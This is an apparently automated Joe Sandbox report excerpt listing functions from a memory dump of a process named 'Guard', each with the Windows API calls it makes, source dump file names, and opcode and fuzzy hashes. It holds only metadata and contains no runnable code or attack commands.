                                                                                            • Part of subcall function 00A4593C: __FF_MSGBANNER.LIBCMT ref: 00A45953
                                                                                            • Part of subcall function 00A4593C: __NMSG_WRITE.LIBCMT ref: 00A4595A
                                                                                            • Part of subcall function 00A4593C: RtlAllocateHeap.NTDLL(00BB0000,00000000,00000001,?,00000004,?,?,00A41003,?), ref: 00A4597F
                                                                                          • std::exception::exception.LIBCMT ref: 00A4101C
                                                                                          • __CxxThrowException@8.LIBCMT ref: 00A41031
                                                                                            • Part of subcall function 00A487CB: RaiseException.KERNEL32(?,?,?,00ADCAF8,?,?,?,?,?,00A41036,?,00ADCAF8,?,00000001), ref: 00A48820
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 3902256705-0
                                                                                          • Opcode ID: 146b673abc6c8b7ab2f6019d93b0beb09448691c7f64ca35852339ca4e6ab594
                                                                                          • Instruction ID: 2db65156e9352211f2fbf28c5997a512c024033b1bdef2399e16bd9b43a6fd48
                                                                                          • Opcode Fuzzy Hash: 146b673abc6c8b7ab2f6019d93b0beb09448691c7f64ca35852339ca4e6ab594
                                                                                          • Instruction Fuzzy Hash: 4BF0A43950421DA6CF20BB68ED159DE7BAC9F81350F100866F91496292DFB19B84D2E1
                                                                                          Function 00A2A820 Relevance: 1.7, APIs: 1, Instructions: 193COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ac62e04d1df91ecf6990f674cfd25c4f6138154762f070c798a956bb49cb705a
                                                                                          • Instruction ID: 8f006c4fb90155f0c98ca78382db781b961d169626372a3ad96388a14df7c4f3
                                                                                          • Opcode Fuzzy Hash: ac62e04d1df91ecf6990f674cfd25c4f6138154762f070c798a956bb49cb705a
                                                                                          • Instruction Fuzzy Hash: 0461DA70600616DFDB10DF69E981B7AB7F9EF58300F11847AE91A8B281D774ED80CB92
                                                                                          Function 00A3410A Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A341B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FilePointer
                                                                                          • String ID:
                                                                                          • API String ID: 973152223-0
                                                                                          • Opcode ID: 6c24001a7b91c4fd766b38e38280f91504c0525bc2c4bcb0694eb44bb59e1890
                                                                                          • Instruction ID: 3b5d824eab0fc3e287bd9cb99a27d5eb2e21d75b9b8611fae6cf0a52ffa2dbac
                                                                                          • Opcode Fuzzy Hash: 6c24001a7b91c4fd766b38e38280f91504c0525bc2c4bcb0694eb44bb59e1890
                                                                                          • Instruction Fuzzy Hash: F6312C71A00A5AAFCB18CF6DC884AADB7B5FF58310F148729F81993714D770BDA08B90
                                                                                          Function 00A40E38 Relevance: 1.6, APIs: 1, Instructions: 94processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00A40EE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3332741929-0
                                                                                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction ID: 1d6e867d9228f7e491c7d3bb1e887dc42b959f1204739f692b08b4a0050bd0d4
                                                                                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                          • Instruction Fuzzy Hash: EA31D379A00109DBC718DF58C481969FBB6FF99300B648AA5E609CB252E731EDD1EBC0
                                                                                          Function 00A5E2DF Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: 6e65c52dea401989ff069f0172d99f6f0921f2a16d3be06fdcebbfe77ebcfd50
                                                                                          • Instruction ID: 030583e5fc1baf8ed13f26958f2860b5d8864c21b6b0e217bfad757f9bf60a99
                                                                                          • Opcode Fuzzy Hash: 6e65c52dea401989ff069f0172d99f6f0921f2a16d3be06fdcebbfe77ebcfd50
                                                                                          • Instruction Fuzzy Hash: 72410974909351DFDB14DF18C584B1ABBE1BF85318F1989ACE8899B362C371EC89CB52
                                                                                          Function 00A349C2 Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00A34B29: FreeLibrary.KERNEL32(00000000,?), ref: 00A34B63
                                                                                            • Part of subcall function 00A4547B: __wfsopen.LIBCMT ref: 00A45486
                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A327AF,?,00000001), ref: 00A349F4
                                                                                            • Part of subcall function 00A34ADE: FreeLibrary.KERNEL32(00000000), ref: 00A34B18
                                                                                            • Part of subcall function 00A348B0: _memmove.LIBCMT ref: 00A348FA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 1396898556-0
                                                                                          • Opcode ID: dd503a2a48b0a40aea386251f2a511d8e4021439612dc86ee88b084811b941e7
                                                                                          • Instruction ID: 022fe1b8bb1d2b8cd64c88aa5c6dffeb8733728841c6790125a45f8312a2a79a
                                                                                          • Opcode Fuzzy Hash: dd503a2a48b0a40aea386251f2a511d8e4021439612dc86ee88b084811b941e7
                                                                                          • Instruction Fuzzy Hash: D2113632A50305ABCF10FF70DE02FAE77A99F48741F10842DF541A6182EF70AE00AB94
                                                                                          Function 00A5E3C2 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: af53384c44f7848e19fdd10c561054e4520d2dae7cda38c533eaf28f4809107e
                                                                                          • Instruction ID: 1e7c52501d3d4ed5230f1344d4b91c36a1fb7c2ea21cf7ac80148791ce27ebd8
                                                                                          • Opcode Fuzzy Hash: af53384c44f7848e19fdd10c561054e4520d2dae7cda38c533eaf28f4809107e
                                                                                          • Instruction Fuzzy Hash: 212110B4909351DFCB14DF18C544B1ABBF1BF84304F058968F88A57362C731E859CB92
                                                                                          Function 00A34220 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00A33CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A34276
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileRead
                                                                                          • String ID:
                                                                                          • API String ID: 2738559852-0
                                                                                          • Opcode ID: d2659063cb16fbb6e0d03897aaf12fe674e1b6ea270737e46f8429d329c6b25d
                                                                                          • Instruction ID: 9c11eb71415dd664bf83d2cb0651ccb8b279a7cb88b5f7e3891388be45d0a7e5
                                                                                          • Opcode Fuzzy Hash: d2659063cb16fbb6e0d03897aaf12fe674e1b6ea270737e46f8429d329c6b25d
                                                                                          • Instruction Fuzzy Hash: 3211F831204B019FD720CF95D480BA7B7F5EB98750F14892DF9AA96A50D7B1F8458B60
                                                                                          Function 00A3408F Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          • Opcode ID: 1f3b9db0a5d42e675f17063b09e5fb3495a3d79c440fe92c364792d37d1b7d4b
                                                                                          • Instruction ID: e28c3e948043062747308f545c90bc42edbdc4825a9c6f3acf34e47243cdb3a1
                                                                                          • Opcode Fuzzy Hash: 1f3b9db0a5d42e675f17063b09e5fb3495a3d79c440fe92c364792d37d1b7d4b
                                                                                          • Instruction Fuzzy Hash: AA017CB9600502AFC305DB28C551D2AF7A9FF8A3507148169F919C7702DB34AC21CBE0
                                                                                          Function 00A9495B Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00A94998
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentVariable
                                                                                          • String ID:
                                                                                          • API String ID: 1431749950-0
                                                                                          • Opcode ID: 38fa3fcbf9b66ce332866f2fbb40d023cbd48dcc4a6c6c720db63a5314754519
                                                                                          • Instruction ID: ad889abe7a1ea12139c5a68f1c2335fc16b2c84e4cbb81758ac20cc3e07a5442
                                                                                          • Opcode Fuzzy Hash: 38fa3fcbf9b66ce332866f2fbb40d023cbd48dcc4a6c6c720db63a5314754519
                                                                                          • Instruction Fuzzy Hash: 23F03135608204AFCB14FBA5D946C9F7BFCEF89320B004155F9049B261DE70BD81C750
                                                                                          Function 00A34A8C Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: _fseek
                                                                                          • String ID:
                                                                                          • API String ID: 2937370855-0
                                                                                          • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                          • Instruction ID: c2c383bacb690107689235a304bc66c6e28a27b14312c489835266325d638d24
                                                                                          • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                                                          • Instruction Fuzzy Hash: 45F085BA800208FFDF108F94DC04CEBBB79EF89320F008198F9045A211D232EA218BA0
                                                                                          Function 00A34A2F Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • FreeLibrary.KERNEL32(?,?,?,00A327AF,?,00000001), ref: 00A34A63
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          • Opcode ID: 788daf220aa5b0b202443cdd054f8a813b19e017fdfeef59d9cd7c9cbc84bb98
                                                                                          • Instruction ID: 4676fa71e9dbbd951a0cc6318f0fb7565d6ed2ab89ec74e3bcb0e832556e9f7a
                                                                                          • Opcode Fuzzy Hash: 788daf220aa5b0b202443cdd054f8a813b19e017fdfeef59d9cd7c9cbc84bb98
                                                                                          • Instruction Fuzzy Hash: 47F01571945701CFCB749F64E495826BBF0AF183657208A6EF1D683721C731A984DB44
                                                                                          Function 00A34AB2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: __fread_nolock
                                                                                          • String ID:
                                                                                          • API String ID: 2638373210-0
                                                                                          • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                          • Instruction ID: e2ef8b8a5a17809e8a2d584637f16265662cd43826d0a39edb01828ee29f40ca
                                                                                          • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                                                          • Instruction Fuzzy Hash: 28F0FE7540020DFFDF05CF90C941EAA7B79FB15314F108589FD194A112D736DA21AB91
                                                                                          Function 00A409C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A409E4
                                                                                            • Part of subcall function 00A31821: _memmove.LIBCMT ref: 00A3185B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongNamePath_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 2514874351-0
                                                                                          • Opcode ID: 2f0827474435367382fc3dd535d0251cee29d57dcffad41e8694d899d8035b8a
                                                                                          • Instruction ID: 032dd2a30d78055b345e9d6b11320b43a1322366298a3fd6f9d58337c62ed276
                                                                                          • Opcode Fuzzy Hash: 2f0827474435367382fc3dd535d0251cee29d57dcffad41e8694d899d8035b8a
                                                                                          • Instruction Fuzzy Hash: 79E0863290012857C721D6989C05FFE77DDEB89691F0502B6FC08D7214D9649C818691
                                                                                          Function 00A84D18 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00A84D31
                                                                                            • Part of subcall function 00A31821: _memmove.LIBCMT ref: 00A3185B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FolderPath_memmove
                                                                                          • String ID:
                                                                                          • API String ID: 3334745507-0
                                                                                          • Opcode ID: 5c79b74143983a4cb972f7dfabab08c6e7a25b0c6f0af016731d5347865f6e7f
                                                                                          • Instruction ID: d96a511e7b075f773e7cb31068fa4d47be46fc5b139476bd52158073198e1c2a
                                                                                          • Opcode Fuzzy Hash: 5c79b74143983a4cb972f7dfabab08c6e7a25b0c6f0af016731d5347865f6e7f
                                                                                          • Instruction Fuzzy Hash: 00D05EA190032C2BDB60E6A4AC4DDB77BACD744220F0007A17C9CC3112E9249D4686E0
                                                                                          Function 00A342AE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00A706E6,00000000,00000000,00000000), ref: 00A342BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: FilePointer
                                                                                          • String ID:
                                                                                          • API String ID: 973152223-0
                                                                                          • Opcode ID: c66f57d57d695bfcc0464c983361b9c7744f47585699d7895d6b278a56bb48ab
                                                                                          • Instruction ID: 9c9228300a3ff789b1507ee43f62c042b93553a04885e5873dcea5879fa4c64f
                                                                                          • Opcode Fuzzy Hash: c66f57d57d695bfcc0464c983361b9c7744f47585699d7895d6b278a56bb48ab
                                                                                          • Instruction Fuzzy Hash: 10D0C77464020CBFE714CB84DC46FAA777CE705710F100394FD0466290D6B27D508795
                                                                                          Function 00A84FEC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetFileAttributesW.KERNEL32(?,00A83BFE), ref: 00A84FED
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000015.00000002.2642900807.0000000000A21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00A20000, based on PE: true
                                                                                          • Associated: 00000015.00000002.2642858160.0000000000A20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643030340.0000000000AD6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643136989.0000000000AE0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                          • Associated: 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_21_2_a20000_Guard.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesFile
                                                                                          • String ID:
                                                                                          • API String ID: 3188754299-0
                                                                                          • Opcode ID: 7c32f71168fe0e9ade4fdd998d62a0e253a4b49bb776caafa0db7a874ca125e7
                                                                                          • Instruction ID: 44fd45dfc952a8eeef40c613fb4f9d99bcb9ec2910796259651e4ffbb4f5d2ca
